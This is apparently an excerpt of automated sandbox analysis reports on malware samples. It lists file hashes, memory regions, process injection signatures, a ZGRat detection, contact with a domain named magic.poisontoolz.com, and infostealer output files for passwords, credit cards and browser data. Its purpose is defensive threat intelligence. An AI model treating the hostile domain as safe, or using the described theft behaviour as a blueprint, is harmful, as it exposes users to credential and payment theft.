| SHA512 | 347a598bb94f87334d776b48bbf647a2390d213c450b8afa866497cb7f5ca8cc57fbd28a7d2b3d279fcf81958948c0a354b7cab5b568f8d3b6fbfe894f4bec74 |
C:\Users\Admin\AppData\Roaming\File2crypt.exe
| MD5 | 5f7664097ffe92ac09565fb443b70849 |
| SHA1 | b8f873c802be357a94d5162ee09f5c3e8ebc46e3 |
| SHA256 | 4467b911160749f59ae0b2308b7270594fc241948aaeda13ff92e7066211f9a3 |
| SHA512 | 52890416edbe90eab2b42dee114680edbab90051234edcde9a00db4b928056b3da1be04af4618a48afad193b76ec28a27c4ee0d7dd8fc3057a2429af0d84e2b9 |
memory/3396-129-0x0000000072170000-0x0000000072920000-memory.dmp
memory/3396-131-0x0000000004BC0000-0x0000000004BD0000-memory.dmp
memory/3396-137-0x0000000004BD0000-0x0000000004DD8000-memory.dmp
memory/3396-140-0x0000000005F80000-0x000000000618A000-memory.dmp
memory/4468-132-0x0000000072170000-0x0000000072920000-memory.dmp
memory/3396-128-0x0000000000040000-0x0000000000258000-memory.dmp
C:\Users\Admin\AppData\Roaming\File2crypt.exe
| MD5 | cf17d3928737eab522ebb617737a6dff |
| SHA1 | 5c42ab8b20034607124f97cedb75e34dd80c9172 |
| SHA256 | e9765d102669d5457e38082b367469c3669889d459f5efd0f8a6c260356d2ae5 |
| SHA512 | af4903ecaa217cf3843b793b11ac387a205a3088defef08e4635929ed1de9bdb2c36fba11df17c84ca2b2a691edf2f9d4e51224242538e0bba18c992da0775ab |
memory/2236-115-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-113-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-105-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-101-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-73-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-71-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-67-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-65-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-61-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-59-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-55-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-53-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-49-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-45-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-44-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-42-0x0000000004A80000-0x0000000004BB6000-memory.dmp
memory/2236-40-0x0000000072170000-0x0000000072920000-memory.dmp
C:\Users\Admin\AppData\Roaming\File1crypt.exe
| MD5 | d53f91c99e731fae151b03b600b1b05b |
| SHA1 | 3d06e3a29acdf75eef3698c0cf72e16990def99c |
| SHA256 | 3e16b688dd6eded9503ebf4a804adaae02e4628cc1cc52c749e17c3ed58123be |
| SHA512 | 5f60964eb2d4df0d0ff7544fb78568e01a7b0f9cd133e509ed17243f858b0acac415d85d03212746af207d4169d7b01a715a5ada92bfe52d417ac25cd55fd8d7 |
C:\Users\Admin\AppData\Roaming\File1crypt.exe
| MD5 | 29c11e7b0c44cbbfec546b0469dcc8a2 |
| SHA1 | 1227f46ba3b08ebad1a6f3536d4e523f5830a12c |
| SHA256 | 572de60da00d0f6ef8657e766d84a5284f3a90d6b6d4cd8795ef1d5af95c0ee6 |
| SHA512 | 143bf88b9d6d07bb0fb0b059d2b6ea2c529e9a401c55653e94fd79285a4e506e42cdd0bc0d5ae7877a0062d3de76dedf1f94c7cfaded7db0f57aa53b581cae06 |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | d0df5f9974138501424cb06472477adf |
| SHA1 | 9d143e2c9c48327c6fa0b4f2fb65be982037db51 |
| SHA256 | 6c3615c908cb98afc062e70b7f985bf7b667fd8540a25824aa07a14b6b6a05d6 |
| SHA512 | 9a7d8b47a8311e00ba206fee9bf0d42991a0caaf43492ea067bb6c9eb333a3231a35bae1efcd95add82d6dbfcfef5e10d42c084b9e73c5fdd7eadf8131324617 |
C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
| MD5 | 21c7373cbebe36d40311199e37a311ff |
| SHA1 | 4966bb36fa9545fa8481d1314471a374f3d053c3 |
| SHA256 | 9219e342d27bc5f3824eb6198773d7953e840b9e62220de75c4652fdfac3815a |
| SHA512 | a09399ab463e5616d61345a0c3538e3ea34d185e12f525ffb7b7f3d364771f7d142969a4e10221c5cb6129b934f48eeae122e0bd50a57ac7f1d0eadb9bdece20 |
memory/2236-2007-0x0000000005190000-0x000000000525E000-memory.dmp
memory/2236-2008-0x0000000005000000-0x000000000504C000-memory.dmp
memory/2236-2002-0x0000000002510000-0x0000000002511000-memory.dmp
C:\Users\Admin\AppData\Roaming\File1crypt.exe
| MD5 | 273a0cfac73dc5c9525fe0b5d3b21dee |
| SHA1 | e29164a17369cbc87a21fac0720249c288ab3097 |
| SHA256 | 3708f0d7d78b4e11fd45fcadc6dc83105870bb8ec92eea2faa00e08989fca735 |
| SHA512 | 337937ae23f2c7282e9a388791cb73857b22e766153e7dbd90b1fe69c66881f745218fe534baecca6a54e1a06d653753de52618ed965bbd24ff4c48ce8d8ed0f |
memory/2348-2028-0x0000000072170000-0x0000000072920000-memory.dmp
memory/2348-2031-0x00000000053C0000-0x0000000005452000-memory.dmp
memory/2348-2037-0x0000000002C50000-0x0000000002C60000-memory.dmp
memory/2348-2026-0x0000000000400000-0x0000000000578000-memory.dmp
memory/2236-2025-0x0000000072170000-0x0000000072920000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\File1crypt.exe.log
| MD5 | 4a911455784f74e368a4c2c7876d76f4 |
| SHA1 | a1700a0849ffb4f26671eb76da2489946b821c34 |
| SHA256 | 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c |
| SHA512 | 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d |
memory/2348-2069-0x0000000006330000-0x000000000633A000-memory.dmp
memory/3396-2079-0x0000000004490000-0x0000000004491000-memory.dmp
memory/3396-2080-0x0000000006480000-0x0000000006622000-memory.dmp
memory/3396-2078-0x0000000072170000-0x0000000072920000-memory.dmp
memory/2112-2086-0x0000000000400000-0x0000000000592000-memory.dmp
memory/2112-2087-0x0000000072170000-0x0000000072920000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Data\Passwords.txt
| MD5 | 36f6acc2229073f5bb4074cee73d1d5b |
| SHA1 | b2adbb44350d984dff40c15fcbbeb3379c7ec0e5 |
| SHA256 | 8a947e0921f9cfada15c19a72f0ff31b38ad4602106c6ee95685d61c223c9a35 |
| SHA512 | da8b627bd674ceb0da7e30ba543ab82ab694d3f6e0474b48ca343ee74e20147440d2205b6ce66f5caa2a39061dedd2ca4146e263fac9f146a228c5b5cba4aaad |
C:\Users\Admin\AppData\Local\Temp\Data\Histories.txt
| MD5 | 412ec159e4b14be1ca93db473e80acc2 |
| SHA1 | 8909b6f7fc8715a749270b6ceb8f05f823f59fd3 |
| SHA256 | eaff9c24df526e9c884832130bf6de9182fd96f3dcdba33e8e5e7a4ed37f1bbe |
| SHA512 | a90524333fd34d44f5784a90ada19904ea7379de26cae08ffdfd2ee25b3fd5b36c2cbcf7a7e6fc4ff734680ca1ff177ed42df1d4f5583d6a1a89d622c183f0b4 |
C:\Users\Admin\AppData\Local\Temp\Data\Downloads.txt
| MD5 | ae0f7fab163139c661e576fe0af08651 |
| SHA1 | 7545ab94360fd93f2209021b4cecabb92592be27 |
| SHA256 | 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657 |
| SHA512 | a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b |
C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt
| MD5 | 0f5f7a38759e578c92bcf62c45d80b8a |
| SHA1 | 211e70ede55cce5bf67f685d85cbd030a8517d2b |
| SHA256 | 39059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc |
| SHA512 | 8130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d |
C:\Users\Admin\AppData\Local\Temp\Data\Autofills.txt
| MD5 | 6be6fdca0cfa94635b8689b2b0bf2bee |
| SHA1 | 379c61029b5443c3d3df7c770423e40618b36d15 |
| SHA256 | 5bc3a7ced261f235f4a30797ad96f803c9e022a95ad6bc7fedc06d0fd2a0abeb |
| SHA512 | 7955fb48977c971563b10420e379ebea01e42582a8dfe2719ec756dda7e757168031a58a3c9fef061c0abb6c799579f7c8b46de4fc5b4ab3519d735092848cd8 |
memory/3396-2088-0x0000000072170000-0x0000000072920000-memory.dmp
memory/2348-2084-0x0000000008B80000-0x0000000008BD0000-memory.dmp
C:\Users\Admin\AppData\Roaming\File2crypt.exe
| MD5 | 194abb15d1b07f052be0b18ffa238050 |
| SHA1 | 8ec9ff9eeb88645f6e6b538c3163cc4894f82ec2 |
| SHA256 | e8f4ee6351764bc703f118df85c629084f85bd325bcc1930f0982461938a4ecb |
| SHA512 | 52c5a71a023f290962a445bc5c6befd0ce8f7310b6c9185022c6b520a07a61f846b684fa1d7533ada37deeb868a59cd0997d9cd1459f32957b527701ca296805 |
memory/2112-2121-0x00000000057E0000-0x00000000057F0000-memory.dmp
memory/2348-2129-0x0000000072170000-0x0000000072920000-memory.dmp
memory/2112-2140-0x0000000005CF0000-0x0000000005CF8000-memory.dmp
memory/2112-2139-0x00000000057B0000-0x00000000057D6000-memory.dmp
memory/2112-2138-0x0000000005C60000-0x0000000005CF2000-memory.dmp
memory/2112-2142-0x0000000006C20000-0x0000000006C28000-memory.dmp
memory/2112-2143-0x0000000006C40000-0x0000000006C5E000-memory.dmp
memory/2112-2141-0x0000000006C10000-0x0000000006C1A000-memory.dmp
C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\Browsers\Firefox\Bookmarks.txt
| MD5 | 2e9d094dda5cdc3ce6519f75943a4ff4 |
| SHA1 | 5d989b4ac8b699781681fe75ed9ef98191a5096c |
| SHA256 | c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142 |
| SHA512 | d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7 |
C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\System\Process.txt
| MD5 | e1261b30bcee5ffdb8725793d8247b4e |
| SHA1 | 22d3a1dd3d1e2e6351301a87b1d5fc79057ab0df |
| SHA256 | 185a74f3aa4672f9b94625d03f8828bbe2d31ad05c825008abdf0e2837921cf7 |
| SHA512 | acb1f33e644f1174079e5708bfbeaf4a227f576a07af56a822261edd88bd65965d52ca17bcc92406662ba4807550abc12692614b4adca9affcf697d2a225e0b5 |
C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\System\Apps.txt
| MD5 | b1d58554f33c991f9454f81bf1f6a7a6 |
| SHA1 | 1a9c0748fbb4c4974315f6a3188ffb5078372de1 |
| SHA256 | 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c |
| SHA512 | ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6 |
memory/2112-2332-0x00000000057E0000-0x00000000057F0000-memory.dmp
memory/2112-2334-0x00000000057E0000-0x00000000057F0000-memory.dmp
memory/2112-2337-0x0000000006E90000-0x0000000006F0A000-memory.dmp
C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\System\Debug.txt
| MD5 | 9f7e8c90c8e4f0e6976a3d69a59e13e6 |
| SHA1 | a678403153d4e71bcae97c83c65707d9bcb86bb6 |
| SHA256 | 9a0344723389aee9269af868fdcd5ae0d22d04eb5e88b656fd146dd143e9a0ce |
| SHA512 | c13cd581b6062c538f2be58e88ec00d518f76e5f0f3870458a51489a4e833f8e7ba8408e58e94038c8dab21c63821d52d181faee1ddbf6128f29bbc545b533ed |
memory/2112-2410-0x0000000007140000-0x00000000071F2000-memory.dmp
C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\System\ProductKey.txt
| MD5 | 71eb5479298c7afc6d126fa04d2a9bde |
| SHA1 | a9b3d5505cf9f84bb6c2be2acece53cb40075113 |
| SHA256 | f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3 |
| SHA512 | 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd |
C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\Directories\Videos.txt
| MD5 | 1fddbf1169b6c75898b86e7e24bc7c1f |
| SHA1 | d2091060cb5191ff70eb99c0088c182e80c20f8c |
| SHA256 | a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733 |
| SHA512 | 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d |
C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\Directories\Startup.txt
| MD5 | 68c93da4981d591704cea7b71cebfb97 |
| SHA1 | fd0f8d97463cd33892cc828b4ad04e03fc014fa6 |
| SHA256 | 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483 |
| SHA512 | 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402 |
memory/2112-2412-0x0000000008300000-0x0000000008654000-memory.dmp
C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\msgid.dat
| MD5 | af6f1933326883369932eff6d98e0098 |
| SHA1 | 888e43aff1981840211a034ba78e048a48ab3b8a |
| SHA256 | 8052615aa0bdf7a250e889aacee4d06c82cd18f01add69f89332d5db3fc1ca21 |
| SHA512 | 46b87b38eac0122ee226e348288a2acf272fb3d2e68503e20a1572a464e0a0b4b70b0f4225d5188b7c6dd1ba12d237a318fe3b43e9b4abae334b54f5a4a255f7 |
memory/2112-2430-0x0000000072170000-0x0000000072920000-memory.dmp
memory/2112-2437-0x00000000057E0000-0x00000000057F0000-memory.dmp
memory/2112-2438-0x00000000057E0000-0x00000000057F0000-memory.dmp
memory/2112-2439-0x00000000057E0000-0x00000000057F0000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231222-en
Max time kernel
5s
Max time network
126s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ZGRat
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 352 set thread context of 2524 | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe"
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.10.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| GB | 96.17.179.70:80 | | tcp |
| GB | 104.77.160.28:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| US | 8.8.8.8:53 | 68.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.179.17.96.in-addr.arpa | udp |
| GB | 104.77.160.28:80 | | tcp |
| GB | 104.77.160.28:80 | | tcp |
| GB | 96.17.179.55:80 | | tcp |
| GB | 96.17.179.55:80 | | tcp |
| GB | 96.17.179.55:80 | | tcp |
| GB | 96.17.179.55:80 | | tcp |
| GB | 96.17.179.55:80 | | tcp |
| GB | 96.17.179.55:80 | | tcp |
| GB | 96.17.179.55:80 | | tcp |
| GB | 96.17.179.55:80 | | tcp |
| GB | 96.17.179.55:80 | | tcp |
| GB | 96.17.179.55:80 | | tcp |
| GB | 96.17.179.55:80 | | tcp |
| GB | 96.17.179.55:80 | | tcp |
| GB | 96.17.179.55:80 | | tcp |
| N/A | 96.16.110.41:443 | | tcp |
| N/A | 20.223.35.26:443 | | tcp |
| N/A | 20.223.35.26:443 | | tcp |
| GB | 96.17.179.55:80 | | tcp |
| GB | 96.17.179.55:80 | | tcp |
| SE | 192.229.221.95:80 | | tcp |
| SE | 192.229.221.95:80 | | tcp |
| GB | 96.17.179.55:80 | | tcp |
| GB | 96.17.179.55:80 | | tcp |
| GB | 96.17.179.55:80 | | tcp |
| GB | 96.17.179.55:80 | | tcp |
Files
memory/352-1-0x00000000751F0000-0x00000000759A0000-memory.dmp
memory/352-0-0x00000000001A0000-0x00000000001BC000-memory.dmp
memory/352-2-0x0000000004BD0000-0x0000000004BE0000-memory.dmp
memory/352-3-0x0000000005660000-0x0000000005796000-memory.dmp
memory/352-11-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-19-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-25-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-33-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-39-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-49-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-57-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-65-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-67-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-63-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-61-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-59-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-55-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-53-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-51-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-47-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-45-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-43-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-41-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-37-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-35-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-31-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-29-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-27-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-23-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-21-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-17-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-15-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-13-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-9-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-7-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-5-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-4-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-938-0x0000000005A70000-0x0000000005ABC000-memory.dmp
memory/352-937-0x00000000059A0000-0x0000000005A6E000-memory.dmp
memory/352-936-0x00000000057A0000-0x00000000057A1000-memory.dmp
memory/352-939-0x0000000006250000-0x00000000067F4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RagCrypt.exe.log
| MD5 | c3941d9fa38f1717d5cecd7a2ca71667 |
| SHA1 | 33b5362675383b58b4166ed9f9a61e5aa6768d2e |
| SHA256 | f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256 |
| SHA512 | 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45 |
memory/2524-945-0x0000000000400000-0x0000000000578000-memory.dmp
memory/2524-944-0x00000000751F0000-0x00000000759A0000-memory.dmp
memory/2524-948-0x0000000005620000-0x0000000005630000-memory.dmp
memory/2524-947-0x0000000005460000-0x00000000054C6000-memory.dmp
memory/2524-946-0x00000000053C0000-0x0000000005452000-memory.dmp
memory/352-943-0x00000000751F0000-0x00000000759A0000-memory.dmp
memory/2524-949-0x0000000006300000-0x000000000630A000-memory.dmp
memory/2524-950-0x00000000087C0000-0x0000000008810000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Data\Downloads.txt
| MD5 | ae0f7fab163139c661e576fe0af08651 |
| SHA1 | 7545ab94360fd93f2209021b4cecabb92592be27 |
| SHA256 | 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657 |
| SHA512 | a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b |
C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt
| MD5 | 0f5f7a38759e578c92bcf62c45d80b8a |
| SHA1 | 211e70ede55cce5bf67f685d85cbd030a8517d2b |
| SHA256 | 39059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc |
| SHA512 | 8130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d |
memory/2524-990-0x00000000751F0000-0x00000000759A0000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
135s
Max time network
150s
Command Line
Signatures
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\A: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\unregmp2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Utsxokye.wav"
C:\Program Files (x86)\Windows Media Player\setup_wm.exe
"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Utsxokye.wav"
C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Windows\system32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | wmploc.dll | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.179.17.96.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\wmsetup.log
| MD5 | 13ab2123a617187ba186a53cef7a5f77 |
| SHA1 | d649d1cbb01018d02fa965adef7b97408d86fe9d |
| SHA256 | e8aa79d9d7ac6947fd7c2fc35b501dbc212ad1c1439d58bd58deae02ff81cf92 |
| SHA512 | e02c68c61711a572e90727129d9ff5f7494218e625f0600e135c44b57a7c29ef2cf2e686fdfb0afe04b4b248f853c88c35cd70761c8585c434d4a62a339fd7ad |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | c374c25875887db7d072033f817b6ce1 |
| SHA1 | 3a6d10268f30e42f973dadf044dba7497e05cdaf |
| SHA256 | 05d47b87b577841cc40db176ea634ec49b0b97066e192e1d48d84bb977e696b6 |
| SHA512 | 6a14f81a300695c09cb335c13155144e562c86bb0ddfdcab641eb3a168877ad3fcc0579ad86162622998928378ea2ffe5a244b3ddbe6c11a959dbb34af374a7d |
